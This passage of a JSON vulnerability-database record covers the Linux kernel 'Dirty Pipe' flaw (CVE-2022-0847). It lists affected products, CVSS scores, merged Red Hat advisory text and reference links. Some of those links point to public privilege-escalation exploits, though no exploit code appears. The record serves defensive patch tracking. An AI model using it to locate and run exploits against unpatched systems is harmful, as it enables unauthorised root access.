                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_lpe9403_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_lpe9403:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:sonicwall:sma1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "12.4.2-02044",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2022-0847",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2022-0847",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2022-0847",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2022-0847",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202203-522",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2022-0847",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A flaw was found in the way the \"flags\" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. Linux Kernel Has an initialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.5.4 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic\n\n5. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.8 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which fix several bugs. See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/\n\nSecurity updates:\n\n* nanoid: Information disclosure via valueOf() function (CVE-2021-23566)\n\n* nodejs-shelljs: improper privilege management (CVE-2022-0144)\n\n* follow-redirects: Exposure of Private Personal Information to an\nUnauthorized Actor (CVE-2022-0155)\n\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n\n* follow-redirects: Exposure of Sensitive Information via Authorization\nHeader leak (CVE-2022-0536)\n\nBug fix:\n\n* RHACM 2.3.8 images (Bugzilla #2062316)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management\n2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2062316 - RHACM 2.3.8 images\n\n5. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel-rt security and bug fix update\nAdvisory ID:       RHSA-2022:0819-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:0819\nIssue date:        2022-03-10\nCVE Names:         CVE-2021-0920 CVE-2021-4154 CVE-2022-0330 \n                   CVE-2022-0435 CVE-2022-0492 CVE-2022-0847 \n                   CVE-2022-22942 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64\nRed Hat Enterprise Linux for Real Time (v. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n\n* kernel: improper initialization of the \"flags\" member of the new\npipe_buffer (CVE-2022-0847)\n\n* kernel: Use After Free in unix_gc() which could result in a local\nprivilege escalation (CVE-2021-0920)\n\n* kernel: local privilege escalation by exploiting the fsconfig syscall\nparameter leads to container breakout (CVE-2021-4154)\n\n* kernel: possible privileges escalation due to missing TLB flush\n(CVE-2022-0330)\n\n* kernel: remote stack overflow via kernel panic on systems using TIPC may\nlead to DoS (CVE-2022-0435)\n\n* kernel: cgroups v1 release_agent feature may allow privilege escalation\n(CVE-2022-0492)\n\n* kernel: failing usercopy allows for use-after-free exploitation\n(CVE-2022-22942)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* kernel symbol \u0027__rt_mutex_init\u0027 is exported GPL-only in kernel\n4.18.0-348.2.1.rt7.132.el8_5 (BZ#2038423)\n\n* kernel-rt: update RT source tree to the RHEL-8.5.z3 source tree\n(BZ#2045589)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031930 - CVE-2021-0920 kernel: Use After Free in unix_gc() which could result in a local privilege escalation\n2034514 - CVE-2021-4154 kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout\n2042404 - CVE-2022-0330 kernel: possible privileges escalation due to missing TLB flush\n2044809 - CVE-2022-22942 kernel: failing usercopy allows for use-after-free exploitation\n2048738 - CVE-2022-0435 kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS\n2051505 - CVE-2022-0492 kernel: cgroups v1 release_agent feature may allow privilege escalation\n2060795 - CVE-2022-0847 kernel: improper initialization of the \"flags\" member of the new pipe_buffer\n\n6. Package List:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8):\n\nSource:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\n\nRed Hat Enterprise Linux for Real Time (v. 8):\n\nSource:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-0920\nhttps://access.redhat.com/security/cve/CVE-2021-4154\nhttps://access.redhat.com/security/cve/CVE-2022-0330\nhttps://access.redhat.com/security/cve/CVE-2022-0435\nhttps://access.redhat.com/security/cve/CVE-2022-0492\nhttps://access.redhat.com/security/cve/CVE-2022-0847\nhttps://access.redhat.com/security/cve/CVE-2022-22942\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/RHSB-2022-002\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYippFNzjgjWX9erEAQhDwRAAjsGfW6qXFI81H8xov/wQnw/PdsUOhzDl\nISzJEeXALEQCloLH+UDcgo/wV1es00USfBo1H/SpDc5ahjBWP2pbo8QtIRKT6h/k\nord4KsAMGjqWRI+zaGbaFoL0q4okMG9H6r731TnhX06CaLXLui8iUJrQLziHo02t\n/AihF9dW30/w4tXyKeMc73D1lKHImQQFfJo5xpIo8Mm7+6GFrkne8Z46SKXjjyfG\nIODAcU3wA0C93bbtR4EHEbenVyVVaE5Phn40vxxF00+AQTHoc5nYpOJbDLI3bi1F\nGbEKQ5pf0jkScwlfEHtHkmjPk92PA/wV41BhPoJw8oKshH4RRxml4Ps0KldI4NrQ\nypmDLZ3CfJ+saFbNLN5BARCiqJavF5A4yszHZ5QuopmC1RJx6/rAuE79KkeB0JvW\nIOaXPzzc05dCqdyVBvNAu+XpVlTbe+XGBR0LalYYjYWxQSrEYAYQ005mcvEWOPRm\nQfPSM7eOaAzo9RGrMirTm0Gz9BJ0TbvNGiMmMTpLdb6akx1BQcQ5bpAjUCQN0O7j\nKIFri0FxflweqZswTchfdbW74VuUyTVaeFYKGhp5hFPV6lFkDUFEFC71ANvPaewE\nX1Z5Ae0gFMD8w5m5eePHqYuEaL6NHtYctHlBh0ef6mrvsKq9lmxJpdXrZUO+eP4w\nnEhPbkKSmMY=\n=CLN6\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-0847",
        "trust": 4.0
      },
      {
        "db": "PACKETSTORM",
        "id": "166230",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "166258",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "166229",
        "trust": 2.4
      },
      {
        "db": "SIEMENS",
        "id": "SSA-222547",
        "trust": 1.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-167-09",
        "trust": 1.4
      },
      {
        "db": "PACKETSTORM",
        "id": "176534",
        "trust": 1.0
      },
      {
        "db": "JVN",
        "id": "JVNVU99030761",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "166516",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "166280",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "166305",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "166812",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "166241",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "166569",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022032843",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031421",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022030808",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022042576",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031308",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031036",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1027",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0965",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.2981",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1677",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1405",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1064",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0944",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2022030042",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2022030060",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "50808",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-0847",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166789",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166282",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166281",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166265",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166264",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "PACKETSTORM",
        "id": "166789"
      },
      {
        "db": "PACKETSTORM",
        "id": "166516"
      },
      {
        "db": "PACKETSTORM",
        "id": "166280"
      },
      {
        "db": "PACKETSTORM",
        "id": "166282"
      },
      {
        "db": "PACKETSTORM",
        "id": "166281"
      },
      {
        "db": "PACKETSTORM",
        "id": "166265"
      },
      {
        "db": "PACKETSTORM",
        "id": "166264"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "id": "VAR-202203-0043",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.21111111
  },
  "last_update_date": "2024-07-23T21:45:03.589000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug\u00a02060795",
        "trust": 0.8,
        "url": "https://fedoraproject.org/"
      },
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=184957"
      },
      {
        "title": "Red Hat: Important: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20220822 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20220831 - security advisory"
      },
      {
        "title": "Red Hat: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2022-0847"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2022-0847"
      },
      {
        "title": "Dirty-Pipe-Oneshot",
        "trust": 0.1,
        "url": "https://github.com/badboy-sft/dirty-pipe-oneshot "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-0847"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202203-522"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-665",
        "trust": 1.0
      },
      {
        "problemtype": "Improper initialization (CWE-665) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.0,
        "url": "http://packetstormsecurity.com/files/166229/dirty-pipe-linux-privilege-escalation.html"
      },
      {
        "trust": 3.0,
        "url": "http://packetstormsecurity.com/files/166258/dirty-pipe-local-privilege-escalation.html"
      },
      {
        "trust": 2.4,
        "url": "http://packetstormsecurity.com/files/166230/dirty-pipe-suid-binary-hijack-privilege-escalation.html"
      },
      {
        "trust": 1.6,
        "url": "https://dirtypipe.cm4all.com/"
      },
      {
        "trust": 1.6,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf"
      },
      {
        "trust": 1.6,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2022-0015"
      },
      {
        "trust": 1.6,
        "url": "https://www.suse.com/support/kb/doc/?id=000020603"
      },
      {
        "trust": 1.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060795"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20220325-0005/"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0847"
      },
      {
        "trust": 1.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0847"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/176534/linux-4.20-ktls-read-only-write.html"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu99030761/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-167-09"
      },
      {
        "trust": 0.7,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.7,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2022030060"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/50808"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2022030042"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166305/red-hat-security-advisory-2022-0841-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031308"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166516/red-hat-security-advisory-2022-1083-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022032843"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166241/ubuntu-security-notice-usn-5317-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1405"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031036"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166280/red-hat-security-advisory-2022-0822-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1027"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022030808"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1064"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-167-09"
      },
      {
